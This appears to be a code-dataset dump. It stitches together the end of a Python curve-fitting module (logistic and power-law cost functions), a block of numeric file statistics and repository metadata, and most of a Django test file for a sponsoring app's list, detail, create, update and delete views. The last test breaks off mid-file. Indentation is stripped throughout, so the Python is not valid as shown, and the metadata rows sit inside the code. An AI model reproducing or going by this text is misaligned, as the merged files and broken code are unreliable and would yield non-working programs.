y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-logistic_p(x,p))**2)
# -----------------------------------------------------------
# a/(1+exp(-b(x-c))) + d - logistic function with offset
def cost_logistic_offset(p, x, y):
"""
Sum of absolute deviations of obs and logistic function 1/x function: L/(1+exp(-k(x-x0))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
`p[3]` a - Offset of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-logistic_offset_p(x,p)))
def cost2_logistic_offset(p,x,y):
"""
Sum of squared deviations of obs and logistic function 1/x function: L/(1+exp(-k(x-x0))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
`p[3]` a - Offset of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-logistic_offset_p(x,p))**2)
# -----------------------------------------------------------
# L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a2 - double logistic function with offset
def cost_logistic2_offset(p, x, y):
"""
Sum of absolute deviations of obs and double logistic function with offset:
L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=7`)
`p[0]` L1 - Maximum of first logistic function
`p[1]` k1 - Steepness of first logistic function
`p[2]` x01 - Inflection point of first logistic function
`p[3]` L2 - Maximum of second logistic function
`p[4]` k2 - Steepness of second logistic function
`p[5]` x02 - Inflection point of second logistic function
`p[6]` a - Offset of double logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-logistic2_offset_p(x,p)))
def cost2_logistic2_offset(p,x,y):
"""
Sum of squared deviations of obs and double logistic function with offset:
L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a
Parameters
----------
p : iterable of floats
parameters (`len(p)=7`)
`p[0]` L1 - Maximum of first logistic function
`p[1]` k1 - Steepness of first logistic function
`p[2]` x01 - Inflection point of first logistic function
`p[3]` L2 - Maximum of second logistic function
`p[4]` k2 - Steepness of second logistic function
`p[5]` x02 - Inflection point of second logistic function
`p[6]` a - Offset of double logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-logistic2_offset_p(x,p))**2)
# -----------------------------------------------------------
# a*(x-b)**c - Sequential Elementary Effects fitting function
def see(x, a, b, c):
"""
Fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
c : float
third parameter
Returns
-------
float
function value(s)
"""
return np.where((x-b)<0., 0., a*(x-b)**c)
def see_p(x, p):
"""
Fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
Returns
-------
float
function value(s)
"""
return np.where((x-p[1]) < 0., 0., p[0] * (x-p[1])**p[2])
def cost_see(p, x, y):
"""
Sum of absolute deviations of obs and fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-see_p(x,p)))
def cost2_see(p,x,y):
"""
Sum of squared deviations of obs and fit function of Sequential Elementary Effects: a * (x-b)**c
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-see_p(x,p))**2)
# -----------------------------------------------------------
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
# Rref = 1.0
# E0 = 126.
# T = 293.15
# resp = 2.0
# print(lloyd_fix(T, Rref, E0))
# #1.40590910521
# print(lloyd_fix_p(T, [Rref, E0]))
# #1.40590910521
# print(cost_lloyd_fix([Rref, E0], T, resp))
# #0.59409089479
# print(cost2_lloyd_fix([Rref, E0], T, resp))
# #0.352943991272
# print(poly(T,2,1))
# #295.15
# print(poly_p(T,[2,1]))
# #295.15
| 24.120785
| 246
| 0.566305
| 5,496
| 39,341
| 3.983079
| 0.070415
| 0.050797
| 0.052624
| 0.070166
| 0.853273
| 0.827235
| 0.806861
| 0.78562
| 0.76922
| 0.761592
| 0
| 0.033626
| 0.281869
| 39,341
| 1,630
| 247
| 24.135583
| 0.741222
| 0.735772
| 0
| 0.063291
| 0
| 0
| 0.091337
| 0.01334
| 0
| 0
| 0
| 0
| 0
| 1
| 0.35443
| false
| 0
| 0.056962
| 0
| 0.765823
| 0.006329
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e6f7cd48e876b5d98ccfe0ce08d644eac95b97b0
| 39,865
|
py
|
Python
|
tests/tests_views.py
|
hbuyse/dj-sponsoring
|
dc1652ab7dbaa25199505dd680e28289a86c7d77
|
[
"MIT"
] | null | null | null |
tests/tests_views.py
|
hbuyse/dj-sponsoring
|
dc1652ab7dbaa25199505dd680e28289a86c7d77
|
[
"MIT"
] | null | null | null |
tests/tests_views.py
|
hbuyse/dj-sponsoring
|
dc1652ab7dbaa25199505dd680e28289a86c7d77
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# coding=utf-8
"""Tests the views."""
from dj_sponsoring.models import Sponsor, SponsorImage, SponsorFile
from django.conf import settings
from django.contrib.auth.models import Permission, User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.urls import reverse
import os.path
class TestSponsorListView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.dict = {
'name': 'Toto',
'summary': 'summary',
'description': 'description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
def test_sponsors_list_view_empty(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsors-list'))
self.assertEqual(r.status_code, 200)
self.assertIn("No sponsors...", str(r.content))
def test_sponsors_list_view_one_sponsor(self):
"""Tests."""
Sponsor.objects.create(**self.dict)
r = self.client.get(reverse('dj_sponsoring:sponsors-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<ul>'), 1)
self.assertEqual(str(r.content).count('<li>'), 1)
self.assertIn("Toto", str(r.content))
self.assertEqual(str(r.content).count('</li>'), 1)
self.assertEqual(str(r.content).count('</ul>'), 1)
class TestSponsorDetailView(TestCase):
"""Tests."""
def test_sponsor_detail_view_not_existing(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 404)
def test_sponsor_detail_view(self):
"""Tests."""
Sponsor.objects.create(name="Toto")
r = self.client.get(reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorCreateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.dict = {
'name': 'Toto',
'summary': 'summary',
'description': 'description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
def test_sponsor_create_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-create'))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-create'), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-create'))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-create'), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/create', r.url)
def test_sponsor_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor'))
r = self.client.get(reverse('dj_sponsoring:sponsor-create'))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 5)
self.assertEqual(str(r.content).count('</label>'), 5)
self.assertIn('Sponsor name', str(r.content))
self.assertIn('Sponsor summary', str(r.content))
self.assertIn('Sponsor description', str(r.content))
self.assertIn('Sponsor logo', str(r.content))
self.assertIn('Sponsor url', str(r.content))
def test_sponsor_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor'))
r = self.client.post(reverse('dj_sponsoring:sponsor-create'), data=self.dict)
s = Sponsor.objects.last()
self.assertEqual(s.name, "Toto")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile("{}/sponsors/{}/logo.png".format(settings.MEDIA_ROOT, s.name)))
class TestSponsorUpdateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.dict = {
'name': 'My Toto',
'summary': 'My summary',
'description': 'My description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
self.sponsor = Sponsor.objects.create(**self.dict)
def test_sponsor_update_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/update'.format(self.sponsor.id), r.url)
def test_sponsor_update_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor'))
r = self.client.get(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 5)
self.assertEqual(str(r.content).count('</label>'), 5)
self.assertIn('Sponsor name', str(r.content))
self.assertIn('Toto', str(r.content))
self.assertIn('Sponsor summary', str(r.content))
self.assertIn('My summary', str(r.content))
self.assertIn('Sponsor description', str(r.content))
self.assertIn('My description', str(r.content))
self.assertIn('Sponsor logo', str(r.content))
self.assertIn('logo.png', str(r.content))
self.assertIn('Sponsor url', str(r.content))
self.assertIn('http://www.google.fr', str(r.content))
def test_sponsor_update_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor'))
self.dict['name'] = 'Toto new'
self.dict['logo'] = SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
r = self.client.post(reverse('dj_sponsoring:sponsor-update', kwargs={'pk': self.sponsor.id}), data=self.dict)
s = Sponsor.objects.get(id=self.sponsor.id)
self.assertEqual(s.name, "Toto new")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile("{}/sponsors/{}/logo.png".format(settings.MEDIA_ROOT, s.name)))
class TestSponsorDeleteView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.dict = {
'name': 'My Toto',
'summary': 'My summary',
'description': 'My description',
'url': 'http://www.google.fr',
'logo': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
}
self.sponsor = Sponsor.objects.create(**self.dict)
def test_sponsor_delete_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/delete'.format(self.sponsor.id), r.url)
def test_sponsor_delete_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor'))
r = self.client.get(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("<h1 class=\"float-left\">{}</h1>".format(self.sponsor.name), str(r.content))
self.assertIn("<p>Do you really want to delete that sponsor and everything linked to it?</p>", str(r.content))
def test_sponsor_delete_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor'))
self.assertEqual(Sponsor.objects.count(), 1)
r = self.client.post(reverse('dj_sponsoring:sponsor-delete', kwargs={'pk': self.sponsor.id}))
self.assertEqual(Sponsor.objects.count(), 0)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsors-list'))
class TestSponsorImageListView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_images_list_view_empty(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-images-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("No images for this sponsor...", str(r.content))
def test_sponsor_image_list_view_one_image(self):
"""Tests."""
SponsorImage.objects.create(sponsor=self.sponsor, alt="Toto")
r = self.client.get(reverse('dj_sponsoring:sponsor-images-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorImageDetailView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_image_detail_view_not_existing(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 404)
def test_sponsor_image_detail_view(self):
"""Tests."""
SponsorImage.objects.create(sponsor=self.sponsor, alt="My alternative text")
r = self.client.get(reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorImageCreateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'img': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png'),
'alt': "My alt",
'description': "My description"
}
def test_sponsor_image_create_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/images/create'.format(self.sponsor.id), r.url)
def test_sponsor_image_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor image'))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor image alternative text', str(r.content))
self.assertIn('Sponsor image', str(r.content))
self.assertIn('Sponsor image description text', str(r.content))
def test_sponsor_image_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor image'))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-create',
kwargs={'pk': self.sponsor.id}), data=self.dict)
s = SponsorImage.objects.last()
self.assertEqual(s.alt, "My alt")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile(
"{}/sponsors/{}/images/{}".format(settings.MEDIA_ROOT, s.sponsor.name, self.dict['img'].name)))
class TestSponsorImageUpdateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'img': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png'),
'alt': "My alt",
'description': "My description"
}
self.si = SponsorImage.objects.create(**self.dict)
def test_sponsor_image_update_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/update'.format(self.si.id), r.url)
def test_sponsor_image_update_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor image'))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-update', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor image alternative text', str(r.content))
self.assertIn('My alt', str(r.content))
self.assertIn('Sponsor image', str(r.content))
self.assertIn(self.si.img.name, str(r.content))
self.assertIn('Sponsor image description', str(r.content))
self.assertIn('My description', str(r.content))
def test_sponsor_image_update_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor image'))
self.dict['alt'] = 'My new alternative text'
self.dict['img'] = SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png')
r = self.client.post(reverse('dj_sponsoring:sponsor-image-update',
kwargs={'pk': self.si.id}), data=self.dict)
si = SponsorImage.objects.get(id=self.si.id)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-image-detail', kwargs={'pk': si.id}))
self.assertEqual(si.alt, 'My new alternative text')
self.assertTrue(os.path.isfile("{}/{}".format(settings.MEDIA_ROOT, si.img.name)))
class TestSponsorImageDeleteView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'img': SimpleUploadedFile(name='index.png',
content=open("tests/index.png", 'rb').read(),
content_type='image/png'),
'alt': "My alt",
'description': "My description"
}
self.si = SponsorImage.objects.create(**self.dict)
def test_sponsor_image_delete_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/images/{}/delete'.format(self.si.id), r.url)
def test_sponsor_image_delete_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor image'))
r = self.client.get(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("<h1 class=\"float-left\">{}</h1>".format(self.si), str(r.content))
self.assertIn("<p>Do you really want to delete that image?</p>", str(r.content))
def test_sponsor_image_delete_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor image'))
self.assertEqual(SponsorImage.objects.count(), 1)
r = self.client.post(reverse('dj_sponsoring:sponsor-image-delete', kwargs={'pk': self.si.id}))
self.assertEqual(SponsorImage.objects.count(), 0)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-images-list', kwargs={'pk': self.si.sponsor.id}))
class TestSponsorFileListView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_images_list_view_empty(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-files-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("No files for this sponsor...", str(r.content))
def test_sponsor_image_list_view_one_image(self):
"""Tests."""
SponsorFile.objects.create(sponsor=self.sponsor, name="My name", description="My description")
r = self.client.get(reverse('dj_sponsoring:sponsor-files-list', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertIn(">My name</a>", str(r.content))
class TestSponsorFileDetailView(TestCase):
"""Tests."""
def setUp(self):
"""Setup for TestSponsorImageListView."""
self.sponsor = Sponsor.objects.create(name="Toto")
def test_sponsor_file_detail_view_not_existing(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 404)
def test_sponsor_file_detail_view(self):
"""Tests."""
SponsorFile.objects.create(sponsor=self.sponsor, name="My name", description="My description")
r = self.client.get(reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': 1}))
self.assertEqual(r.status_code, 200)
self.assertIn("Toto", str(r.content))
class TestSponsorFileCreateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
self.sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'file': SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
'name': "My name",
'description': "My description"
}
def test_sponsor_file_create_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/{}/files/create'.format(self.sponsor.id), r.url)
def test_sponsor_file_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor file'))
